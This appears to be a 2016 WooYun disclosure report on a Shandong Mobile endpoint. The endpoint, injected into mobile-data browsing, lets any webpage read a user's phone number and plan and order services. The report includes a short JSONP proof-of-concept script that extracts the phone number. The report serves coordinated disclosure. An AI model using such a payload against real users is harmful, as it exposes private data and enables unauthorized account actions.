当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0187912

漏洞标题:山东移动某接口可任意调用导致手机号码泄露办理各种业务

相关厂商:山东移动

漏洞作者: virusdefender

提交时间:2016-03-23 11:20

修复时间:2016-05-09 18:00

公开时间:2016-05-09 18:00

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-23: 细节已通知厂商并且等待厂商处理中
2016-03-25: 厂商已经确认,细节仅向厂商公开
2016-04-04: 细节向核心白帽子及相关领域专家公开
2016-04-14: 细节向普通白帽子公开
2016-04-24: 细节向实习白帽子公开
2016-05-09: 细节向公众公开

简要描述:

我好像知道xx一下就能给你打电话的原因了

详细说明:

山东移动在使用3/4G的时候,会在网页中插入一段js,然后在网页右下角显示一个流量球,显示你当前剩余流量,点击流量球还可以办理业务。

QQ20160322-0@2x.png


QQ20160322-1@2x.png


但是在js进行ajax请求查询的时候没有进行有效的安全校验,导致用户在使用3/4G的时候该接口可以被任意网页js调用,可以获取用户手机号码,当前已经办理的业务,当前的套餐情况,办理各种套餐等。

QQ20160322-2@2x.png


获取手机号的poc

var angular = {"callbacks": {"_y": function(data){console.log(data);alert(data.respparam.phoneNumber);}}};
$.ajax({
        url: "http://**.**.**.**:8080/html/servicereq/queryMessageList?callback=angular.callbacks._y&csession=-1648015146&reqparam=%7B%22flag%22:%22-1%22,%22startNum%22:%221%22,%22number%22:%2210%22%7D&templateId=fullscreenbar",
        method: "get",
        dataType: "jsonp",
        jsonp: "angular.callbacks._y",
})


办理业务和获取套餐信息同理

漏洞证明:

091AF6BEE6B7BD81C97B2AEF37A35DAD.jpg


267DF22B5F7BCE3C50AA1537E042E462.jpg


Markup_Screenshot_2016-03-22-21-32-17-869_QQ.png

修复方案:

你们更懂

版权声明:转载请注明来源 virusdefender@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2016-03-25 18:00

厂商回复:

CNVD确认所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无

漏洞评价:

评价

  1. 2016-03-23 12:42 | j14n ( 普通白帽子 | Rank:1712 漏洞数:315 | ... . -.-. - . .- --)

    给我冲个花费

  2. 2016-03-23 15:01 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @j14n 这个漏洞能帮你花话费 :P

  3. 2016-03-23 15:18 | j14n ( 普通白帽子 | Rank:1712 漏洞数:315 | ... . -.-. - . .- --)

    @疯狗 -_-!还是留着打电话吧!